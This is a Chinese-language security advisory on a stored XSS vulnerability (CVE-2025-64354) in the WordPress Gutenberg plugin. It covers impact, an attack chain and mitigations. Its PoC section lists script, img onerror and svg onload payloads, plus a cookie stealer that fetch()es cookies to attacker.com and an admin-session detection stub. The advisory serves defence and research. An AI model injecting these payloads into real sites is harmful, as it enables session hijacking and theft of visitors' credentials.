CVE-2025-64354: WordPress Gutenberg插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64354

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Gutenberg (WordPress Gutenberg插件)

漏洞概述

CVE-2025-64354是WordPress Gutenberg插件中的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分6.5，属于中危级别。该漏洞存在于Gutenberg编辑器在处理用户输入时未能正确对特殊字符进行转义处理，导致攻击者可以在文章或页面的内容中注入恶意JavaScript脚本。当其他用户访问包含恶意代码的内容时，这些脚本将在其浏览器上下文中执行，从而实现会话劫持、敏感信息窃取、网页内容篡改等恶意操作。Gutenberg是WordPress官方开发的区块编辑器插件，被广泛应用于数百万个WordPress网站。该漏洞影响Gutenberg 21.8.2及以下所有版本，攻击者需要拥有WordPress站点的内容编辑权限（如作者或更高权限）才能利用此漏洞。由于存储型XSS的特点，恶意脚本会永久保存在服务器端，所有访问受影响页面的用户都可能受到攻击，因此该漏洞具有较大的影响范围和潜在危害。

技术细节

该存储型XSS漏洞的根本原因在于Gutenberg插件在处理用户提交的富文本内容时，对HTML标签和JavaScript代码的过滤和转义不充分。当用户在Gutenberg编辑器中创建或编辑文章时，插件会将用户输入的内容序列化为HTML并存储到数据库中。如果攻击者在内容中插入精心构造的脚本标签（如<script>alert('XSS')</script>）或事件处理器（如<img src=x onerror=alert('XSS')>），这些恶意代码会被直接保存到数据库中而不会被清除或转义。当其他用户访问包含恶意代码的文章时，WordPress会从数据库中检索并渲染这些内容，浏览器会将存储的HTML作为可信内容解析，从而执行其中的JavaScript代码。攻击者可以利用此漏洞窃取受害者的Cookie信息（用于会话劫持）、键盘记录、页面内容抓取，或者在受害者不知情的情况下执行其他恶意操作。由于Gutenberg的区块编辑机制允许使用原始HTML区块，攻击者可以绕过可视化编辑器的输入验证，直接注入恶意代码。修复此漏洞需要在内容保存和输出时实施严格的HTML转义和内容过滤策略。

攻击链分析

STEP 1

步骤1

攻击者在目标WordPress站点注册账户并获得作者或更高权限的用户角色

STEP 2

步骤2

攻击者登录后台，进入文章编辑器，添加一个HTML区块（HTML块）

STEP 3

步骤3

攻击者在HTML区块中插入恶意JavaScript代码，如<script>标签或带事件处理器的HTML元素

STEP 4

步骤4

攻击者发布或更新文章，恶意代码被永久存储到数据库中

STEP 5

步骤5

当其他用户（编辑者、订阅者或访客）访问包含恶意代码的文章页面时，浏览器会执行其中的JavaScript脚本

STEP 6

步骤6

恶意脚本可以窃取用户的会话Cookie、键盘输入或执行其他恶意操作，攻击者利用窃取的凭证进行进一步入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Gutenberg Stored XSS PoC - CVE-2025-64354 -->
<!-- This PoC demonstrates the stored XSS vulnerability in Gutenberg <= 21.8.2 -->
<!-- Steps to reproduce:
     1. Login to WordPress with author or higher privileges
     2. Create a new post or edit an existing one
     3. Add an HTML block
     4. Insert the following payload:
-->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Event Handler XSS Payload -->
<img src=x onerror=alert('XSS')>

<!-- SVG XSS Payload -->
<svg onload=alert(document.domain)>

<!-- Stored Cookie Stealer -->
<script>
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>

<!-- WordPress Admin Privilege Escalation Test -->
<script>
  if(document.cookie.includes('wordpress_sec_')) {
    console.log('WordPress admin session detected');
    // Steal admin session
  }
</script>

影响范围

Gutenberg <= 21.8.2

防御指南

临时缓解措施

如果无法立即升级Gutenberg插件，可以采取以下临时缓解措施：1）使用WordPress安全插件（如Wordfence Security）提供实时的XSS攻击防护；2）配置Web应用防火墙规则，过滤包含<script>标签、onerror/onload等事件处理器属性的请求；3）限制用户注册功能，仅允许受信任的用户创建内容；4）定期审查所有文章内容，检查是否存在可疑的脚本代码；5）考虑临时禁用Gutenberg插件，回退到经典的WordPress编辑器；6）实施严格的访问控制，确保只有绝对必要的用户才具有内容发布权限。